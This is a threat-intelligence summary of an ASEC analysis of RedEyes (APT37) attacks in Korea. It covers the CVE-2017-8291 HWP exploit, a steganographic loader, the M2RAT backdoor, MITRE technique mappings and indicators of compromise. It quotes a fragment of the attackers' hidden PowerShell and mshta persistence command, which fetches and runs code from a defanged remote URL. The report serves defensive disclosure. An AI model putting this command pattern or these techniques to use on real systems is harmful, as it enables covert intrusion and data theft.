ASEC analyzed RedEyes (ScarCruft/APT37) activity in Korea, revealing the group’s use of the Hangul EPS vulnerability CVE-2017-8291 to spread malware via steganography and a new M2RAT backdoor that employs shared memory for C2. The operation combines persistence through Run keys and PowerShell/mshta, data exfiltration via password-protected archives, and targeted information theft from individuals.
Keypoints
- RedEyes (ScarCruft) used CVE-2017-8291 in Hangul EPS to trigger shellcode when a crafted HWP document is opened.
- Steganography was used to conceal the initial payload inside a JPEG image, with the image sourced from wallup.net.
- A dropped PE payload (lskdjfei.exe) downloads a backdoor (M2RAT) and injects into explorer.exe for C2 and persistence.
- Persistence is achieved via a Run key in HKCUSoftwareMicrosoftWindowsCurrentVersionRun, invoking PowerShell and mshta on boot.
- The newly observed M2RAT uses shared memory sections (Map2*) for C2 and supports extensive exfiltration features (screen capture, keystrokes, document/voice data).
- Exfiltration includes password-protected RAR archives of targeted data, sent to attacker servers, with data staged under %TEMP% paths.
MITRE Techniques
- [T1203] Exploitation for Client Execution – The vulnerable EPS file (CVE-2017-8291) is embedded in a document and, when opened, triggers shellcode execution in a third-party module. Quote: ‘the vulnerable EPS file (CVE-2017-8291) was included in the “form.hwp” file, and when the user opens the document, the shellcode executes in the third-party module.’
- [T1027.001] Obfuscated/Compressed Files and Information (Steganography) – Payload is hidden inside an image via steganography to evade network detection. Quote: ‘스테가노그래피 기법으로 악성코드를 이미지에 포함하는 기법을 사용하였다.’
- [T1547.001] Registry Run Keys/Startup Folder – Persistence via HKCUSoftwareMicrosoftWindowsCurrentVersionRun with a PowerShell/mshta startup command. Quote: ‘레지스트리 Run 키에 등록되는 명령어는 …’
- [T1059.001] PowerShell – Used as part of the startup command to run hidden PowerShell commands. Quote: ‘PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass …’
- [T1218.005] Mshta – Signed binary proxy execution via mshta to fetch and execute code. Quote: ‘… || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html’
- [T1071.001] Web Protocols – C2 communications over HTTP(S) via POST bodies to issue commands. Quote: ‘C&C 통신 명령 체계는 공격자 서버로부터 POST 메소드의 Body로 명령을 전달받으며 …’
- [T1113] Screen Capture – M2RAT captures the screen as part of data exfiltration. Quote: ‘[그림 11] M2RAT의 C&C … 캡쳐 화면’
- [T1056.001] Input Capture (Keylogging) – Keylogging data exfiltration as part of data theft. Quote: ‘키로깅 데이터 유출’
- [T1041] Exfiltration Over C2 Channel – Data including documents and audio is exfiltrated via attacker servers, with passwords and archives used. Quote: ‘데이터 유출 … WinRAR로 비밀번호 압축한 뒤 결과를 공격자 서버에 전송한다.’
- [T1560.001] Archive Collected Data – Data is compressed with WinRAR (password-protected) before exfiltration. Quote: ‘RAR 압축 옵션 …’
Indicators of Compromise
- [MD5] EPS file – Exploit/EPS.Generic (2023.01.16.03) – 8b666fc04af6de45c804d973583c76e0
- [MD5] Steganography JPEG – Data/BIN.Agent (2023.02.15.00) – 93c66ee424daf4c5590e21182592672e
- [MD5] PE file (Stage PE) – Trojan/Win.Loader.C5359534 (2023.01.16.03) – 7bab405fbc6af65680443ae95c30595d
- [MD5] PowerShell script Downloader – PS.Generic.SC185661 (2023.01.16.03) – 9083c1ff01ad8fabbcd8af1b63b77e66
- [MD5] M2RAT – Trojan/Win.M2RAT.C5357519 (2023.01.14.01) – 4488c709970833b5043c0b0ea2ec9fa9
- [MD5] Mobile data theft – Infostealer/Win.Phone.C5381667 (2023.02.14.03) – 7f5a72be826ea2fe5f11a16da0178e54
- [Domain/URL] Steganography image source – wallup.net (image used to hide payload)
- [File/Path] Dropped PE path – %Temp%/lskdjfei.exe (final backdoor launcher)
- [Registry] Run key for persistence – HKCUSoftwareMicrosoftWindowsCurrentVersionRun with RyPO
- [Registry] M2RAT identifiers – HKCUSoftwareOneDriverVersion (MAC XOR 0x5C), Property (server address XOR 0x5C)
Read more: https://asec.ahnlab.com/ko/47622/